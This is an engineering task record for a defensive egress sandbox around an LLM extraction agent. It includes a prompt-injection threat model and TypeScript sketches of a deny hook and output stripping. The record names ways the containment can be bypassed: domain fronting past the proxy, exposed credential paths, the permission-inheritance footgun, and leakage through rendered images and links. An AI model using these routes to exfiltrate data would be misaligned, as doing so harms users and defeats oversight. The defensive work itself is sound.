Deny-by-default egress sandbox around the extraction agent — break the lethal trifecta so a hijacked agent structurally cannot exfiltrate (the single load-bearing build finding)

task-extraction-deny-by-default-egress-sandbox

task · confidence: asserted · status: review · 2026-06-20 · owner: platform-engineer

source log-auditor — surfaced recording 0059-untrusted-by-default-ingestion-serve-boundary, which names this as the single load-bearing build finding (research §9d/§9f, the lethal-trifecta + Agent-SDK egress-control passes; the §9f bypassPermissions footgun is the explicit build-team warning). Board globbed before filing — no open task covered an egress sandbox / Agent-SDK permission posture (the runtime tasks cover the BoardWorker seam and the board claim-guard, not extraction egress containment). MODEL-LAYER SCOPE BUILT + VERIFIED by the forward-deployed-engineer on 2026-06-20 — @dossier/runtime egress-sandbox.ts + wiring + red→green containment test; promoted inferred→asserted. The OS-level guarantee (--network none + TLS-terminating allowlist proxy + kernel isolation) is a deploy-time control deferred to the regulated-tenant build (see body).

Deny-by-default egress sandbox around the extraction agent

The single load-bearing build finding of the DEC-0059 synthesis. The ingest→extract→serve pipeline is a textbook lethal trifecta (private data + untrusted content + exfiltration ability). The durable defense is to remove the exfiltration leg architecturally, assuming injection succeeds — not to detect every payload.

The control

Run extraction (and, separately, serve) with deny-by-default egress:

In the Claude Agent SDK: permissionMode:"dontAsk" + an explicit allowedTools allow-list + a PreToolUse deny-hook (inspects tool_name/tool_input; a deny decision wins even over the permission mode).
Enforce the real guarantee at the OS level (--network none + a domain-allowlisting proxy), not at the model layer.
NEVER use bypassPermissions: it ignores allowedTools and is inherited by every subagent, and Dossier uses subagents (see "Extraction runtime architecture — the moat" and "Agentic-agency runtime topology — compile personas from the OKF graph and activate the reserved BoardWorker over the deterministic spine"). This is the explicit build-team footgun.
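The model-layer posture above can be sketched roughly as follows. This is a minimal illustration, not the shipped egress-sandbox.ts: the HookInput and HookDecision types are simplified local stand-ins rather than the Agent SDK's real type definitions, the EGRESS_PATTERN regex is an assumed heuristic, and the containmentConfig object only mirrors the option names mentioned in this task. The name egressGuardHook is borrowed from the build notes; its body here is hypothetical.

```typescript
// Hypothetical local types: simplified stand-ins for the SDK's hook shapes.
type HookInput = { tool_name: string; tool_input: Record<string, unknown> };
type HookDecision = { permissionDecision: "allow" | "deny"; reason: string };

// Read-only tools only; none of these can open a network connection.
const ALLOWED_TOOLS: readonly string[] = ["Read", "Grep", "Glob"];

// Assumed heuristic for egress attempts smuggled into tool input.
// It is deliberately broad: a false positive fails closed.
const EGRESS_PATTERN = /\b(?:https?|ftp|wss?):\/\/|\b(?:curl|wget|nc|ssh|scp)\b/i;

function egressGuardHook(input: HookInput): HookDecision {
  // Anything off the allow-list is denied outright.
  if (!ALLOWED_TOOLS.includes(input.tool_name)) {
    return {
      permissionDecision: "deny",
      reason: `tool ${input.tool_name} is not on the allow-list`,
    };
  }
  // Even an allowed tool is denied if its input looks like an egress attempt.
  const serialized = JSON.stringify(input.tool_input);
  if (EGRESS_PATTERN.test(serialized)) {
    return {
      permissionDecision: "deny",
      reason: "tool input contains an egress indicator",
    };
  }
  return { permissionDecision: "allow", reason: "read-only tool, no egress indicators" };
}

// Illustrative config object: field names mirror the options named in this task.
// Note what is absent: bypassPermissions never appears.
const containmentConfig = {
  permissionMode: "dontAsk",
  allowedTools: [...ALLOWED_TOOLS],
  preToolUse: egressGuardHook,
};
```

The hook checks the allow-list first and the input second, so a deny is reached on either path regardless of the permission mode. This remains a model-layer backstop; the OS-level control is what actually removes the network.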

Caveats to respect (from official docs)

The built-in proxy does not TLS-terminate, so domain fronting can bypass the allowlist; use a TLS-terminating proxy. Sandboxes share the host kernel; use gVisor/Firecracker for kernel isolation. The default read policy still allows ~/.ssh and ~/.aws/credentials; add them to denyRead. Also add deterministic impact-blocking on extraction output (strip or deny outbound links and image-render exfil channels). Residual: data can still leak via rendered output, so this is containment, not 100% prevention.
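As a rough illustration of deterministic impact-blocking on output, the sketch below strips the most common link and image channels from a text body. The function name stripExfilChannelsSketch and its regexes are hypothetical and are not the shipped implementation. Regex stripping is a coarse filter rather than a full sanitizer, which is one reason the residual above remains.

```typescript
// Hypothetical sketch: remove channels through which rendered output could
// carry data to an attacker-controlled host.
function stripExfilChannelsSketch(body: string): string {
  return body
    // Markdown images ![alt](url): dropped entirely, since rendering one triggers a fetch.
    .replace(/!\[[^\]]*\]\([^)]*\)/g, "")
    // Markdown links [text](url): keep the visible text, drop the target.
    .replace(/\[([^\]]*)\]\([^)]*\)/g, "$1")
    // HTML tags of any kind (img, a, iframe, ...), including <https://...> autolinks.
    .replace(/<[^>]*>/g, "")
    // Any remaining raw http(s) URLs and data: URIs.
    .replace(/\b(?:https?:\/\/|data:)\S+/gi, "[link removed]");
}

// Usage: a body carrying an injected image beacon and a raw URL.
const cleaned = stripExfilChannelsSketch(
  "Summary ![p](https://evil.example/p?d=secret) see [docs](https://evil.example) at https://evil.example/q",
);
```

The order matters: images are removed before links so that the link rule does not leave a stray "!" behind, and raw URLs are handled last so targets already removed are not processed twice.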

Why a task, not a fix-in-place

This is a real runtime/Agent-SDK hardening change (permission posture + OS sandbox + proxy + output hook) with a demonstrated containment test. It needs owner judgment plus code, and it is the highest-leverage item in the DEC-0059 set (hence p0). Detail + citations: research/2026-06-18-sensitive-data-and-injection-defense.md §9d, §9f.

Build status (2026-06-20) — model-layer scope DONE + VERIFIED → `review`

Built by the forward-deployed-engineer. Atomic module packages/runtime/src/egress-sandbox.ts (single source of truth for the agent's containment config), wired into the agentic transport agentSdkTurnRunner (packages/runtime/src/live-session.ts), proven by a red→green offline containment test (packages/runtime/test/egress-sandbox.test.ts, 6 cases). Gates green: pnpm typecheck, pnpm test (513 passed / 2 skipped), pnpm build, pnpm kb:check, pnpm plugin:check.

Acceptance criteria — status:

✅ permissionMode:"dontAsk" + explicit allowedTools allow-list (Read/Grep/Glob — no egress tool) + PreToolUse deny-hook (egressGuardHook, inspects tool_name/tool_input, deny wins over mode) — simulated injection exfiltrates ZERO.
✅ bypassPermissions NEVER used — grep-asserted absent in the agent config; the test enforces its absence.
⏳ OS-level guarantee DEFERRED (--network none + a TLS-terminating domain-allowlist proxy). The model-layer posture backs it and never weakens it (OS_EGRESS_GUARANTEE names the control set), but the deploy-time enforcement is reserved to the regulated-tenant build — it needs the per-tenant runtime substrate (Per-tenant runtime isolation — make the tenant a process/network/key boundary (not a directory), with a per-tenant vector namespace + server-side tenant binding, so a poisoned/sensitive atom is contained to ONE tenant). The OS-layer mechanism is now specified by DEC-0071 (@anthropic-ai/sandbox-runtime, proxy-first; --network none + allowlist proxy as the load-bearing control; gVisor/Firecracker as an escalation tier, not the default), behind the new ContainmentSubstrate seam. This is the honest gap: the model layer is verified, the OS layer is not yet enforced.
⏳ Kernel isolation considered, NOT enforced (gVisor/Firecracker named in OS_EGRESS_GUARANTEE; deploy-time). ~/.ssh + ~/.aws/credentials denied via scoped disallowedTools Read rules + the hook's secret-path backstop (the SDK has no denyRead field — the criterion's denyRead is honored via the documented mechanism).
✅ Deterministic impact-blocking on OUTPUT (stripOutputExfilChannels strips markdown/img/raw/data:/html-tag exfil channels from emitted atom bodies, applied in parseAtoms); residual stated honestly (rendered-output leakage constrained, not 100% eliminated). Fail-closed quarantine (quarantineUntrusted) on the untrusted-content path. Cross-links DEC-0059.
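The secret-path backstop mentioned in the criteria above could look something like the following. This is a hedged sketch only: isSecretPath, normalizePath, and SECRET_RELATIVE_PATHS are hypothetical names, the home directory is passed in explicitly, and the check assumes absolute or ~-prefixed POSIX paths. It does not resolve symlinks, so it complements rather than replaces the scoped deny rules.

```typescript
// Hypothetical list of secret locations, relative to the agent user's home.
const SECRET_RELATIVE_PATHS = [".ssh", ".aws/credentials"];

// Expand a leading "~" and collapse "." and ".." segments (POSIX-style paths only).
function normalizePath(p: string, home: string): string {
  const expanded = p === "~" ? home : p.startsWith("~/") ? home + p.slice(1) : p;
  const out: string[] = [];
  for (const seg of expanded.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") out.pop();
    else out.push(seg);
  }
  return "/" + out.join("/");
}

// True when the requested path is a secret location or lies beneath one.
function isSecretPath(requested: string, home: string): boolean {
  const target = normalizePath(requested, home);
  return SECRET_RELATIVE_PATHS.some((rel) => {
    const secret = normalizePath(`${home}/${rel}`, home);
    return target === secret || target.startsWith(secret + "/");
  });
}
```

Normalizing before comparing is the point of the sketch: a traversal such as /home/agent/work/../.aws/credentials should be caught just as the direct path is, while a sibling such as ~/.sshx should not match.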

Disposition: the model-layer scope is complete + verified; this sits in review for a human to approve (→ done) or re-scope. The OS-level + kernel-isolation enforcement is the residual, carried by the regulated-tenant build (DEC-0059 §Review gate (3) is now met at the model layer; the full gate also needs the OS-level enforcement). confidence: asserted (built + measured at the model layer; not verified because the OS-level guarantee is unbuilt).
